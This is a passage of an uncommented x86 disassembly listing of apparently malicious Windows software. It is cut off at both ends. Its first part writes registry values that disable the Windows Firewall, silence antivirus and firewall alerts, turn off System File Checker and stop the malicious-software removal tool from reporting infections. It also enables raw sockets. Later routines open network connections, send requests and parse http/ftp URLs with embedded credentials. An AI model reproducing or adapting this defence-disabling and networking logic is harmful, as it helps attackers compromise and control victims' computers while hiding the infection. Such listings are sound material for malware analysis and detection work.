push offset aTcpmaxdupacks ; "TcpMaxDupAcks"
push edi
push esi
call sub_4213E8
add esp, 40h
push 0C8000h
push offset aLargebuffersiz ; "LargeBufferSize"
push edi
push esi
call sub_4213E8
push ebp
push offset aAllowuserrawac ; "AllowUserRawAccess"
push edi
push esi
call sub_4213E8
push 0FFFFFEh
push offset aTcpnumconnecti ; "TcpNumConnections"
push edi
push esi
call sub_4213E8
push ebp
push offset aDisablerawsecu ; "DisableRawSecurity"
push offset aSystemCurren_1 ; "SYSTEM\\CurrentControlSet\\Services\\Afd\\P"...
push esi
call sub_4213E8
add esp, 40h
push 0FFFEh
push offset aMaxconnections ; "MaxConnectionsPer1_0Server"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000001h
call sub_4213E8
push 0FFFEh
push offset aMaxconnectio_0 ; "MaxConnectionsPerServer"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000001h
call sub_4213E8
push 4000h
push offset aSizreqbuf ; "SizReqBuf"
push offset aSystemCurren_2 ; "SYSTEM\\CurrentControlSet\\Services\\Lanma"...
push esi
call sub_4213E8
push 0FFFFFF9Dh
push offset aSfcdisable ; "SFCDisable"
push offset aSoftwarePolici ; "Software\\Policies\\Microsoft\\Windows NT\\"...
push esi
call sub_4213E8
add esp, 40h
push ebx
push offset aSfcscan ; "SFCScan"
push offset aSoftwarePolici ; "Software\\Policies\\Microsoft\\Windows NT\\"...
push esi
call sub_4213E8
push ebp
push offset aAutoshareserve ; "AutoShareServer"
push offset aSystemCurren_2 ; "SYSTEM\\CurrentControlSet\\Services\\Lanma"...
push esi
call sub_4213E8
push ebp
push offset aAutosharewks ; "AutoShareWks"
push offset aSystemCurren_2 ; "SYSTEM\\CurrentControlSet\\Services\\Lanma"...
push esi
call sub_4213E8
push ebp
push offset aDevice ; "\\Device\\"
push offset aTransportbindn ; "TransportBindName"
push offset aSystemCurren_3 ; "SYSTEM\\CurrentControlSet\\Services\\NetBT"...
push esi
call sub_421409
add esp, 44h
push ebx
push offset aEnablefirewall ; "EnableFirewall"
push offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\SharedAcc"...
push esi
call sub_4213E8
push ebx
push offset aDonotallowexce ; "DoNotAllowExceptions"
push offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\SharedAcc"...
push esi
call sub_4213E8
push ebp
push offset aDisablenotific ; "DisableNotifications"
push offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\SharedAcc"...
push esi
call sub_4213E8
push ebx
push offset aEnablefirewall ; "EnableFirewall"
push offset aSystemContro_0 ; "SYSTEM\\ControlSet001\\Services\\SharedAcc"...
push esi
call sub_4213E8
add esp, 40h
push ebx
push offset aDonotallowexce ; "DoNotAllowExceptions"
push offset aSystemContro_0 ; "SYSTEM\\ControlSet001\\Services\\SharedAcc"...
push esi
call sub_4213E8
push ebp
push offset aDisablenotific ; "DisableNotifications"
push offset aSystemContro_0 ; "SYSTEM\\ControlSet001\\Services\\SharedAcc"...
push esi
call sub_4213E8
push ebp
push offset aAntivirusdisab ; "AntiVirusDisableNotify"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Security Center"
push esi
call sub_4213E8
push ebp
push offset aAntivirusoverr ; "AntiVirusOverride"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Security Center"
push esi
call sub_4213E8
add esp, 40h
push ebp
push offset aFirewalldisabl ; "FirewallDisableNotify"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Security Center"
push esi
call sub_4213E8
push ebp
push offset aFirewalloverri ; "FirewallOverride"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Security Center"
push esi
call sub_4213E8
push ebp
push offset aDontreportinfe ; "DontReportInfectionInformation"
push offset aSoftwarePoli_0 ; "SOFTWARE\\Policies\\Microsoft\\MRT"
push esi
call sub_4213E8
add esp, 30h
call sub_41E96F
lea eax, [esp+3C0h+var_3B0]
push eax
push ebx
push ebx
push offset sub_41EA30
push ebx
push ebx
call dword_437180 ; CreateThread
push 0FFFFFEh
push offset aTcpnumconnecti ; "TcpNumConnections"
push edi
push esi
call sub_4213E8
add esp, 10h
mov esi, offset dword_457E60
push 100h
push esi
call dword_456F4C ; gethostname
push esi
call dword_456FD4 ; gethostbyname
mov dword_457C50, eax
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_456FDC ; inet_ntoa
push 10h
push eax
push offset dword_457CF8
mov dword_457D10, eax
call sub_429D10
push offset dword_457E1C
mov dword_457D0C, ebx
call sub_420D91
add esp, 10h
mov esi, offset dword_457E1C
jmp loc_4195EA
; ---------------------------------------------------------------------------
loc_41955C: ; CODE XREF: sub_418FA1+652�j
mov ecx, esi
call sub_41DB60
test al, al
jnz short loc_4195BC
call sub_427ECD
mov eax, dword_457D0C
mov ecx, esi
mov edi, eax
imul eax, 0B8h
add eax, offset byte_443FDF
imul edi, 0B8h
push eax
push 0Ch
push ebp
call sub_41D181
push eax
push 4
push 8
mov ecx, esi
call sub_41D181
push eax
push 5
push 7
mov ecx, esi
call sub_41D181
push eax
lea eax, dword_443F40[edi]
push dword_443FF0[edi]
mov ecx, esi
push eax
call sub_41C8B1
loc_4195BC: ; CODE XREF: sub_418FA1+5C4�j
mov ecx, esi
call sub_41CB2A
push 3E8h
call dword_437190 ; Sleep
mov eax, dword_445D20
dec eax
cmp dword_457D0C, eax
jnz short loc_4195E4
mov dword_457D0C, ebx
jmp short loc_4195EA
; ---------------------------------------------------------------------------
loc_4195E4: ; CODE XREF: sub_418FA1+639�j
inc dword_457D0C
loc_4195EA: ; CODE XREF: sub_418FA1+5B6�j
; sub_418FA1+641�j
mov ecx, esi
call sub_41DB64
test al, al
jnz loc_41955C
call sub_4235A4
call dword_456E58 ; WSACleanup
push dword_457F64
call dword_4370DC ; ReleaseMutex
push ebx
call dword_437174 ; ExitThread
sub_418FA1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419617 proc near ; CODE XREF: sub_41985D+31�p
; sub_419C4E+21�p ...
mov eax, ecx
xor ecx, ecx
mov dword ptr [eax], offset off_437334
mov [eax+4], ecx
mov [eax+0Ch], ecx
mov [eax+8], ecx
retn
sub_419617 endp
; =============== S U B R O U T I N E =======================================
sub_41962B proc near ; DATA XREF: .text:off_437334�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_41968F
test [esp+4+arg_0], 1
jz short loc_419641
push esi
call sub_4290D0
pop ecx
loc_419641: ; CODE XREF: sub_41962B+D�j
mov eax, esi
pop esi
retn 4
sub_41962B endp
; =============== S U B R O U T I N E =======================================
sub_419647 proc near ; CODE XREF: sub_41985D+25�p
; sub_419913+30�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
and dword ptr [esi+4], 0
and dword ptr [esi+0Ch], 0
mov dword ptr [esi], offset off_437334
call sub_4196C2
and dword ptr [esi+8], 0
mov eax, esi
pop esi
retn 4
sub_419647 endp
; =============== S U B R O U T I N E =======================================
sub_41966B proc near ; CODE XREF: sub_41985D+72�p
; sub_419B11+11E�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
and dword ptr [esi+4], 0
and dword ptr [esi+0Ch], 0
mov dword ptr [esi], offset off_437334
call sub_41970F
and dword ptr [esi+8], 0
mov eax, esi
pop esi
retn 4
sub_41966B endp
; =============== S U B R O U T I N E =======================================
sub_41968F proc near ; CODE XREF: sub_41962B+3�p
; sub_41985D+7A�p ...
push esi
mov esi, ecx
mov eax, [esi+4]
mov dword ptr [esi], offset off_437334
test eax, eax
jz short loc_4196A6
push eax
call sub_4298F2
pop ecx
loc_4196A6: ; CODE XREF: sub_41968F+E�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
test eax, eax
jz short loc_4196B8
push eax
call sub_4298F2
pop ecx
loc_4196B8: ; CODE XREF: sub_41968F+20�j
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
pop esi
retn
sub_41968F endp
; =============== S U B R O U T I N E =======================================
sub_4196C2 proc near ; CODE XREF: sub_419647+15�p
; sub_41970F+F�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
mov eax, [esi+4]
test eax, eax
jz short loc_4196D3
push eax
call sub_4298F2
pop ecx
loc_4196D3: ; CODE XREF: sub_4196C2+8�j
push [esp+4+arg_0]
call sub_4293A0
mov [esi+0Ch], eax
add eax, 2
push eax
call sub_4297B8
mov ecx, [esi+0Ch]
mov [esi+4], eax
inc ecx
inc ecx
push ecx
push 0
push eax
call sub_429760
push dword ptr [esi+0Ch]
push [esp+1Ch+arg_0]
push dword ptr [esi+4]
call sub_429D10
add esp, 20h
pop esi
retn 4
sub_4196C2 endp
; =============== S U B R O U T I N E =======================================
sub_41970F proc near ; CODE XREF: sub_41966B+15�p
; sub_419A7D�j ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
mov ecx, [esp+4+arg_0]
call sub_419A8C
push eax
mov ecx, esi
call sub_4196C2
pop esi
retn 4
sub_41970F endp
; =============== S U B R O U T I N E =======================================
sub_419727 proc near ; CODE XREF: sub_419770+F�p
; sub_419B11+A9�p ...
arg_0 = dword ptr 4
push esi
push edi
push [esp+8+arg_0]
mov esi, ecx
call sub_4293A0
add [esi+0Ch], eax
mov eax, [esi+0Ch]
inc eax
push eax
call sub_4297B8
pop ecx
mov edi, eax
pop ecx
push dword ptr [esi+4]
push edi
call dword_4370B4 ; lstrcpyA
push [esp+8+arg_0]
push edi
call dword_437090 ; lstrcatA
mov eax, [esi+4]
test eax, eax
jz short loc_419768
push eax
call sub_4298F2
pop ecx
loc_419768: ; CODE XREF: sub_419727+38�j
mov [esi+4], edi
pop edi
pop esi
retn 4
sub_419727 endp
; =============== S U B R O U T I N E =======================================
sub_419770 proc near ; CODE XREF: sub_419C4E+414�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
mov ecx, [esp+4+arg_0]
call sub_419A8C
push eax
mov ecx, esi
call sub_419727
pop esi
retn 4
sub_419770 endp
; =============== S U B R O U T I N E =======================================
sub_419788 proc near ; CODE XREF: sub_419C4E+69�p
; sub_419C4E+79�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push dword ptr [ecx+4]
call dword_437178 ; lstrcmpiA
retn 4
sub_419788 endp
; =============== S U B R O U T I N E =======================================
sub_419798 proc near ; CODE XREF: .text:0041A2F8�p
; .text:0041A4A6�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push dword ptr [ecx+4]
call sub_42A8C0
pop ecx
pop ecx
retn 4
sub_419798 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4197A9 proc near ; CODE XREF: .text:0041A1DC�p
; .text:0041A1FB�p ...
var_2000 = byte ptr -2000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 2000h
call sub_429B60
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_2000]
push [ebp+arg_4]
push 2000h
push eax
call sub_42B8AA
mov ecx, [ebp+arg_0]
add esp, 10h
lea eax, [ebp+var_2000]
push eax
call sub_4196C2
leave
retn
sub_4197A9 endp
; =============== S U B R O U T I N E =======================================
sub_4197E2 proc near ; CODE XREF: sub_419C4E+A2�p
; .text:0041A272�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_4197F0
retn 4
sub_4197E2 endp
; =============== S U B R O U T I N E =======================================
sub_4197F0 proc near ; CODE XREF: sub_4197E2+6�p
arg_0 = byte ptr 4
push esi
push edi
movsx edi, [esp+8+arg_0]
mov esi, ecx
push edi
push dword ptr [esi+4]
call sub_42B1A0
pop ecx
test eax, eax
pop ecx
jz short loc_41981B
push edi
push dword ptr [esi+4]
call sub_42B1A0
pop ecx
pop ecx
xor ecx, ecx
inc ecx
sub ecx, [esi+4]
add eax, ecx
loc_41981B: ; CODE XREF: sub_4197F0+16�j
pop edi
pop esi
retn 8
sub_4197F0 endp
; =============== S U B R O U T I N E =======================================
sub_419820 proc near ; CODE XREF: sub_419C4E+38F�p
; sub_419C4E+3A9�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_41982E
retn 4
sub_419820 endp
; =============== S U B R O U T I N E =======================================
sub_41982E proc near ; CODE XREF: sub_419820+6�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
push dword ptr [esi+4]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_419859
push [esp+4+arg_0]
push dword ptr [esi+4]
call sub_42AEA0
pop ecx
pop ecx
xor ecx, ecx
inc ecx
sub ecx, [esi+4]
add eax, ecx
loc_419859: ; CODE XREF: sub_41982E+13�j
pop esi
retn 8
sub_41982E endp
; =============== S U B R O U T I N E =======================================
sub_41985D proc near ; CODE XREF: sub_4198F0+17�p
; .text:0041A2CF�p ...
mov eax, offset loc_436324
call sub_42B7CC
sub esp, 18h
and dword ptr [ebp-14h], 0
push edi
mov edi, [ebp+10h]
mov [ebp-10h], ecx
cmp edi, 1
jge short loc_419889
mov ecx, [ebp+8]
push offset byte_454A54
call sub_419647
jmp short loc_4198DE
; ---------------------------------------------------------------------------
loc_419889: ; CODE XREF: sub_41985D+1B�j
push ebx
push esi
lea ecx, [ebp-24h]
call sub_419617
and dword ptr [ebp-4], 0
lea esi, [edi+1]
push esi
call sub_4297B8
mov ebx, eax
push esi
push 0
push ebx
call sub_429760
mov eax, [ebp-10h]
push edi
mov eax, [eax+4]
add eax, [ebp+0Ch]
push eax
push ebx
call sub_429420
add esp, 1Ch
lea ecx, [ebp-24h]
push ebx
call sub_4196C2
mov ecx, [ebp+8]
lea eax, [ebp-24h]
push eax
call sub_41966B
lea ecx, [ebp-24h]
call sub_41968F
pop esi
pop ebx
loc_4198DE: ; CODE XREF: sub_41985D+2A�j
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop edi
mov large fs:0, ecx
leave
retn 0Ch
sub_41985D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4198F0 proc near ; CODE XREF: sub_419C4E+39C�p
; sub_419C4E+3B6�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
call sub_41DB5C
sub eax, [ebp+arg_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41985D
mov eax, [ebp+arg_0]
leave
retn 8
sub_4198F0 endp
; =============== S U B R O U T I N E =======================================
sub_419913 proc near ; CODE XREF: sub_419A5E+13�p
; .text:0041A59C�p ...
mov eax, offset loc_436357
call sub_42B7CC
sub esp, 28h
push ebx
xor ebx, ebx
mov [ebp-14h], ebx
mov al, [ebp+0Bh]
push esi
push edi
mov [ebp-24h], al
mov [ebp-20h], ebx
mov [ebp-1Ch], ebx
mov [ebp-18h], ebx
push dword ptr [ecx+4]
xor esi, esi
inc esi
lea ecx, [ebp-34h]
mov [ebp-4], esi
call sub_419647
lea ecx, [ebp-34h]
mov byte ptr [ebp-4], 2
call sub_419A8C
mov [ebp-10h], eax
mov cl, [eax]
cmp cl, bl
jz loc_4199FA
mov edi, [ebp+10h]
loc_419964: ; CODE XREF: sub_419913+E1�j
mov dl, [edi]
cmp cl, dl
jnz short loc_419972
loc_41996A: ; CODE XREF: sub_419913+5D�j
inc eax
mov [ebp-10h], eax
cmp [eax], dl
jz short loc_41996A
loc_419972: ; CODE XREF: sub_419913+55�j
cmp byte ptr [eax], 22h
setz byte ptr [ebp+13h]
cmp [ebp+13h], bl
jz short loc_419982
inc eax
mov [ebp-10h], eax
loc_419982: ; CODE XREF: sub_419913+69�j
lea eax, [ebp-10h]
lea ecx, [ebp-24h]
push eax
call sub_41B1E4
mov eax, [ebp-10h]
cmp [ebp+13h], bl
mov cl, [eax]
jz short loc_4199C9
cmp cl, bl
jz short loc_4199FA
loc_41999C: ; CODE XREF: sub_419913+A2�j
cmp cl, 22h
jnz short loc_4199AD
mov cl, [eax+1]
cmp cl, 20h
jz short loc_4199B7
cmp cl, bl
jz short loc_4199B7
loc_4199AD: ; CODE XREF: sub_419913+8C�j
inc eax
mov [ebp-10h], eax
mov cl, [eax]
cmp cl, bl
jnz short loc_41999C
loc_4199B7: ; CODE XREF: sub_419913+94�j
; sub_419913+98�j
cmp [eax], bl
jz short loc_4199FA
mov [eax], bl
mov eax, [ebp-10h]
cmp [eax+1], bl
jz short loc_4199F0
inc eax
inc eax
jmp short loc_4199ED
; ---------------------------------------------------------------------------
loc_4199C9: ; CODE XREF: sub_419913+83�j
cmp cl, bl
jz short loc_4199FA
mov dl, [edi]
loc_4199CF: ; CODE XREF: sub_419913+C8�j
cmp cl, dl
jz short loc_4199DD
inc eax
mov [ebp-10h], eax
mov cl, [eax]
cmp cl, bl
jnz short loc_4199CF
loc_4199DD: ; CODE XREF: sub_419913+BE�j
mov cl, [eax]
cmp cl, bl
jz short loc_4199FA
cmp cl, dl
jnz short loc_4199F0
mov [eax], bl
mov eax, [ebp-10h]
inc eax
loc_4199ED: ; CODE XREF: sub_419913+B4�j
mov [ebp-10h], eax
loc_4199F0: ; CODE XREF: sub_419913+B0�j
; sub_419913+D2�j
mov cl, [eax]
cmp cl, bl
jnz loc_419964
loc_4199FA: ; CODE XREF: sub_419913+48�j
; sub_419913+87�j ...
cmp [ebp-20h], ebx
jz short loc_419A0D
mov eax, [ebp-1Ch]
sub eax, [ebp-20h]
sar eax, 2
cmp [ebp+0Ch], eax
jb short loc_419A1F
loc_419A0D: ; CODE XREF: sub_419913+EA�j
mov ecx, [ebp+8]
push offset byte_454A54
call sub_419647
mov [ebp-14h], esi
jmp short loc_419A37
; ---------------------------------------------------------------------------
loc_419A1F: ; CODE XREF: sub_419913+F8�j
push dword ptr [ebp+0Ch]
lea ecx, [ebp-24h]
call sub_41B1B7
push dword ptr [eax]
mov ecx, [ebp+8]
call sub_419647
mov [ebp-14h], esi
loc_419A37: ; CODE XREF: sub_419913+10A�j
lea ecx, [ebp-34h]
call sub_41968F
lea ecx, [ebp-24h]
mov [ebp-4], bl
call sub_41B19E
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 10h
sub_419913 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A5E proc near ; CODE XREF: sub_419C4E+42�p
; sub_419C4E+95�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push 0
and [ebp+var_4], 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419913
mov eax, [ebp+arg_0]
leave
retn 0Ch
sub_419A5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_419A7D proc near ; CODE XREF: sub_419C4E+3C3�p
; sub_419C4E+3F2�p ...
jmp sub_41970F
sub_419A7D endp
; =============== S U B R O U T I N E =======================================
sub_419A82 proc near ; CODE XREF: .text:0041A5C2�p
; .text:0041A965�p ...
arg_0 = dword ptr 4
mov eax, [ecx+4]
add eax, [esp+arg_0]
retn 4
sub_419A82 endp
; =============== S U B R O U T I N E =======================================
sub_419A8C proc near ; CODE XREF: sub_41970F+7�p
; sub_419770+7�p ...
mov eax, [ecx+4]
retn
sub_419A8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A90 proc near ; CODE XREF: sub_419B11+29�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push esi
push eax
push 101h
call dword_4372B8 ; WSAStartup
push 6
push 1
push 2
call dword_4372BC ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_419B07
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_429760
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call dword_4372C4 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_41E3EC
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_4372CC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_419B0C
push esi
call dword_4372D8 ; closesocket
loc_419B07: ; CODE XREF: sub_419A90+2D�j
or eax, 0FFFFFFFFh
jmp short loc_419B0E
; ---------------------------------------------------------------------------
loc_419B0C: ; CODE XREF: sub_419A90+6E�j
mov eax, esi
loc_419B0E: ; CODE XREF: sub_419A90+7A�j
pop esi
leave
retn
sub_419A90 endp
; =============== S U B R O U T I N E =======================================
sub_419B11 proc near ; CODE XREF: .text:0041A24A�p
; .text:0041A475�p ...
mov eax, offset loc_43636C
call sub_42B7CC
mov eax, 1014h
call sub_429B60
mov eax, [ebp+10h]
push esi
xor esi, esi
push dword ptr [eax+40h]
lea ecx, [eax+10h]
mov [ebp-20h], esi
call sub_419A8C
push eax
call sub_419A90
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+10h], eax
jnz short loc_419B5B
mov ecx, [ebp+8]
push offset byte_454A54
call sub_419647
jmp loc_419C3E
; ---------------------------------------------------------------------------
loc_419B5B: ; CODE XREF: sub_419B11+36�j
push ebx
push edi
push esi
push dword ptr [ebp+0Ch]
call sub_4293A0
pop ecx
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+10h]
call dword_4372D0 ; send
push offset byte_454A54
lea ecx, [ebp-1Ch]
call sub_419647
mov edi, dword_4372D4
mov [ebp-4], esi
mov esi, 1000h
loc_419B8F: ; CODE XREF: sub_419B11+B4�j
; sub_419B11+DC�j
push 0
lea eax, [ebp-1020h]
push esi
push eax
push dword ptr [ebp+10h]
call edi ; dword_4372D4
mov ebx, eax
test ebx, ebx
jle short loc_419BEF
cmp ebx, esi
jge short loc_419BB0
and byte ptr [ebp+ebx-1020h], 0
loc_419BB0: ; CODE XREF: sub_419B11+95�j
lea eax, [ebp-1020h]
lea ecx, [ebp-1Ch]
push eax
call sub_419727
and dword ptr [ebp+0Ch], 0
test ebx, ebx
jle short loc_419B8F
loc_419BC7: ; CODE XREF: sub_419B11+DA�j
mov eax, [ebp+0Ch]
push 4
push offset asc_446DEC ; "\r\n\r\n"
lea eax, [ebp+eax-1020h]
push eax
call sub_42B940
add esp, 0Ch
test eax, eax
jz short loc_419BEF
inc dword ptr [ebp+0Ch]
cmp [ebp+0Ch], ebx
jl short loc_419BC7
jmp short loc_419B8F
; ---------------------------------------------------------------------------
loc_419BEF: ; CODE XREF: sub_419B11+91�j
; sub_419B11+D2�j ...
push 0
lea eax, [ebp-1020h]
push esi
push eax
push dword ptr [ebp+10h]
call edi ; dword_4372D4
test eax, eax
jle short loc_419C1F
cmp eax, esi
jge short loc_419C0E
and byte ptr [ebp+eax-1020h], 0
loc_419C0E: ; CODE XREF: sub_419B11+F3�j
lea eax, [ebp-1020h]
lea ecx, [ebp-1Ch]
push eax
call sub_419727
jmp short loc_419BEF
; ---------------------------------------------------------------------------
loc_419C1F: ; CODE XREF: sub_419B11+EF�j
push dword ptr [ebp+10h]
call dword_4372D8 ; closesocket
mov ecx, [ebp+8]
lea eax, [ebp-1Ch]
push eax
call sub_41966B
lea ecx, [ebp-1Ch]
call sub_41968F
pop edi
pop ebx
loc_419C3E: ; CODE XREF: sub_419B11+45�j
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop esi
mov large fs:0, ecx
leave
retn
sub_419B11 endp
; =============== S U B R O U T I N E =======================================
sub_419C4E proc near ; CODE XREF: .text:0041A0F0�p
; .text:0041A3E3�p ...
mov eax, offset loc_436418
call sub_42B7CC
sub esp, 50h
push esi
xor esi, esi
cmp [ebp+8], esi
jnz short loc_419C6A
xor eax, eax
jmp loc_41A07E
; ---------------------------------------------------------------------------
loc_419C6A: ; CODE XREF: sub_419C4E+13�j
push ebx
push edi
lea ecx, [ebp-1Ch]
call sub_419617
push dword ptr [ebp+8]
lea ecx, [ebp-1Ch]
mov [ebp-4], esi
call sub_4196C2
mov ebx, offset asc_446E08 ; ":"
lea eax, [ebp-3Ch]
push ebx
push esi
push eax
lea ecx, [ebp-1Ch]
call sub_419A5E
mov edi, [ebp+0Ch]
push eax
mov ecx, edi
mov byte ptr [ebp-4], 1
call sub_41970F
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
call sub_41968F
push offset aHttp ; "http"
mov ecx, edi
call sub_419788
test eax, eax
jz short loc_419CD4
push offset aFtp ; "ftp"
mov ecx, edi
call sub_419788
test eax, eax
jnz loc_41A072
loc_419CD4: ; CODE XREF: sub_419C4E+70�j
mov esi, offset asc_446DF8 ; "/"
lea eax, [ebp-3Ch]
push esi
push 1
push eax
lea ecx, [ebp-1Ch]
call sub_419A5E
push 40h
mov ecx, eax
mov byte ptr [ebp-4], 2
call sub_4197E2
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
mov [ebp+8], eax
call sub_41968F
cmp dword ptr [ebp+8], 0
push esi
lea ecx, [ebp-1Ch]
push 1
jz loc_419F0E
lea eax, [ebp-5Ch]
push eax
call sub_419A5E
push offset a@_6 ; "@"
lea ecx, [ebp-4Ch]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 3
call sub_419A5E
push ebx
lea ecx, [ebp-3Ch]
push 0
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 4
call sub_419A5E
lea ecx, [edi+10h]
push eax
mov byte ptr [ebp-4], 5
call sub_41970F
lea ecx, [ebp-3Ch]
call sub_41968F
lea ecx, [ebp-4Ch]
call sub_41968F
and byte ptr [ebp-4], 0
lea ecx, [ebp-5Ch]
call sub_41968F
push offset byte_454A54
lea ecx, [edi+10h]
call sub_419788
test eax, eax
jnz short loc_419D86
loc_419D7F: ; CODE XREF: sub_419C4E+23F�j
; sub_419C4E+2BB�j ...
xor esi, esi
jmp loc_41A072
; ---------------------------------------------------------------------------
loc_419D86: ; CODE XREF: sub_419C4E+12F�j
push esi
lea eax, [ebp-3Ch]
push 1
push eax
lea ecx, [ebp-1Ch]
call sub_419A5E
push offset a@_6 ; "@"
lea ecx, [ebp-4Ch]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 6
call sub_419A5E
push ebx
lea ecx, [ebp-5Ch]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 7
call sub_419A5E
mov ecx, eax
call sub_419A8C
push eax
call sub_42A100
pop ecx
mov [edi+40h], eax
lea ecx, [ebp-5Ch]
call sub_41968F
lea ecx, [ebp-4Ch]
call sub_41968F
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
call sub_41968F
cmp dword ptr [edi+40h], 0
jnz short loc_419E1E
push offset aHttp ; "http"
mov ecx, edi
call sub_419788
test eax, eax
jnz short loc_419E07
mov dword ptr [edi+40h], 50h
loc_419E07: ; CODE XREF: sub_419C4E+1B0�j
push offset aFtp ; "ftp"
mov ecx, edi
call sub_419788
test eax, eax
jnz short loc_419E1E
mov dword ptr [edi+40h], 15h
loc_419E1E: ; CODE XREF: sub_419C4E+1A0�j
; sub_419C4E+1C7�j
push esi
lea eax, [ebp-3Ch]
push 1
push eax
lea ecx, [ebp-1Ch]
call sub_419A5E
push offset a@_6 ; "@"
lea ecx, [ebp-4Ch]
push 0
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 8
call sub_419A5E
push ebx
lea ecx, [ebp-5Ch]
push 0
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 9
call sub_419A5E
lea ecx, [edi+20h]
push eax
mov byte ptr [ebp-4], 0Ah
call sub_41970F
lea ecx, [ebp-5Ch]
call sub_41968F
lea ecx, [ebp-4Ch]
call sub_41968F
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
call sub_41968F
push offset byte_454A54
lea ecx, [edi+20h]
call sub_419788
test eax, eax
jz loc_419D7F
push esi
lea eax, [ebp-3Ch]
push 1
push eax
lea ecx, [ebp-1Ch]
call sub_419A5E
push offset a@_6 ; "@"
lea ecx, [ebp-4Ch]
push 0
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 0Bh
call sub_419A5E
push ebx
lea ecx, [ebp-5Ch]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 0Ch
call sub_419A5E
lea ebx, [edi+30h]
push eax
mov ecx, ebx
mov byte ptr [ebp-4], 0Dh
call sub_41970F
lea ecx, [ebp-5Ch]
call sub_41968F
lea ecx, [ebp-4Ch]
call sub_41968F
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
call sub_41968F
push offset byte_454A54
mov ecx, ebx
call sub_419788
test eax, eax
jnz loc_419FD9
jmp loc_419D7F
; ---------------------------------------------------------------------------
loc_419F0E: ; CODE XREF: sub_419C4E+C0�j
lea eax, [ebp-4Ch]
push eax
call sub_419A5E
push ebx
lea ecx, [ebp-5Ch]
push 0
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 0Eh
call sub_419A5E
lea ecx, [edi+10h]
push eax
mov byte ptr [ebp-4], 0Fh
call sub_41970F
lea ecx, [ebp-5Ch]
call sub_41968F
and byte ptr [ebp-4], 0
lea ecx, [ebp-4Ch]
call sub_41968F
push offset byte_454A54
lea ecx, [edi+10h]
call sub_419788
test eax, eax
jz loc_419D7F
push esi
lea eax, [ebp-4Ch]
push 1
push eax
lea ecx, [ebp-1Ch]
call sub_419A5E
push ebx
lea ecx, [ebp-5Ch]
push 1
push ecx
mov ecx, eax
